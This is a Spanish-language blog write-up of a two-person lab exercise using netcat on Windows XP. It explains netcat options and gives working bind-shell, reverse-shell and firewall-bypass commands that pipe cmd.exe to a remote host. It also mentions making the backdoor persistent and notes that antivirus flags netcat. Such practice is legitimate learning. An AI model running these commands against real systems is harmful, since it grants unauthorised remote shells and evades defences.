Banner 1

Direct Shell & Reverse Shell Nc

Objetivos:
Tener tanto Shell Directa desde la pc de la victima como Reverse Shell.

Herramientas:
NetCat

Integrantes:
andavid(victima - Juaker).
Lutio(Juaker -v ictima).

Conclusion:
Se obtuvo la shell sin problema ya q se ha dejado q el puerto del victimario quedase en listening.
se obtuvieron unos errores en el proceso de reverse shell.



Imagenes(acciòn):









Atravesando el firewall de windows




Imagen del proceso con el firewal activo



Sobre la reverse shell

andavid:


Solucion

Bueno señores, como se planteo...obtener una shell remota con ayuda del netcat, primero que todo el escenario:

Dos pc's con windows sp2 y el nc
Firewall y AV cerrados (en un principio)
Las ganas de juakiarme de lutio Cheesy

Primero que todo vamos a empezar por el principio...yo era la victima asi que tanto la shell remota como la reverse shell la iba a hacer desde mi equipo dandolo en bandeja de plata. De esta forma tenemos para empezar que explicar algunas opciones del NC que es bien lllamada la "navaja suiza" porque aparte de dar sesiones remotas nos puede iservir de firewall (ocupando puertos) y hasta de servidor ftp y ssh algo que tal vez veamos mas adelante. Las opciones:

-d modo stealth que lo hace trabajar sin consola, osea la sesion queda abierta independientemente que la consola este abierta (obviamente hay que ejecutar el comando)

-L Cierra y permite que la conexion vuelva a abrirse, esta opcion puede ser utilizada con todo su poder si se hace una puerta trasera y se añade al run del equipo

-v espera conexion entrante, usualmente se usan dos -vv (doble verbose por si la primera conexion entrante falla).

-p como en nmap siginfica el puerto para conexion o en escucha sea atacante o victima correspondientemente

-l en escucha de conexion, solo valida en una sesion-

-e De execution, para ejecutar programas acompañado del

Asi, tenemos las principales aun asi pueden encontrar abundantes manuales en la red, por ejemplo:
http://daniellerch.com/sources/doc/gnu_netcat.html

NOTA:Pueden encontrarse con dificultades tales como la de ejecucion del netcat, es preferible que se ponga en system32 para hacer una ejecucion directa, algunos Av lo detetan como hacktools asi que seria bueno que lo agregaran a las politicas de uso.

Despues de tenerlo instalado en ambas maquinas procedemos con la practica:

Shell remota con netcat

El sueño de todos, entrar en una pc, como veremos no es tan dificil y menos si hacemos esta practica en una red local (eso si con la responsabiidad que esto acarrea)

Lutio (atacante) pone en su consola de win algo como:
nc -vv ip victima 2500

En donde el se va a conectar al puerto 6000 usando verbose para esto...pero a donde se va a conectar pues a mi pero antes yo tengo que darle permiso para ello de la siguiente forma:

nc -l -d -e cmd.exe -p 2500

Lo dejo para que ejecute mi consola en stealth (cubierto) y yo hago espera de conexion para que el entre.

Reverse shell con netcat

En esta practica si tuvimos algunos problemas, pero de todas formas les voy a explicar mas o menos en que consiste:

El atacante abre un puerto en espera de conexion, dice a su vistima que se conecte para que el obtenga su shell, no necesita saber la ip de la victima porque va a ser la victima la que se conecte con el con la direccion ip del atacante, en la practica seria algo como:

Atacante:
nc -vv -l -p 2500

Dos veboses, una ejecucion en escucha de conexion y un puerto en este caso el 6000

Victima:
nc -d -e cmd.exe ip atacante 2500

Stealth (activarlo en background o sin "verse") y el proceso cmd.exe en la ip remota.

Cuando intentamos hacerla no funciono muy bien, aunque ya habia hecho esta practica con Lord Nikon pero haciendo uso de una red virtual creada por el programa hamachi (si el mismod e los juegos sirve para juakiar) y en ese caso si pudimos hacerla asi que pues sirve pero esta vez no pudimos Sad.

Saltar Firewall

La salida del firewall se pudo hacer cuando se hizo una redireccion de puertos por trafico aceptado (hablando del firewall de windows que proteje harto Roll Eyes ), entons se hizo algo como:

nc ip lutio 80 | cmd.exe | nc mi ip 25

Como ven el trafico es seguro, y el firewall ni se imuta, estos e puede ver claramente en un video que hice mientras me juakiaba, y como pude detectar su intrusion sin hacer uso del firewall ni del antivirus que guardara log. Cuando termine de editarlo lo subo con unos screenshots de la practica.

Proximamente mas intrusiones Cheesy

Saludos

Aca dejo el video, esta sin editar porque me dio pereza, algo digno de un novato Cheesy
http://rapidshare.com/files/23287180/Shell_remota.rar

PD:Veran por ahi aparecer un paper sobre netcat que hizo zhyzura del hacker.net, se los recomiendo.

Lutio no pudo atravesar mi firewall verdadero Tongue

No hay comentarios:

Powered by Bad Robot
Helped by Blackubay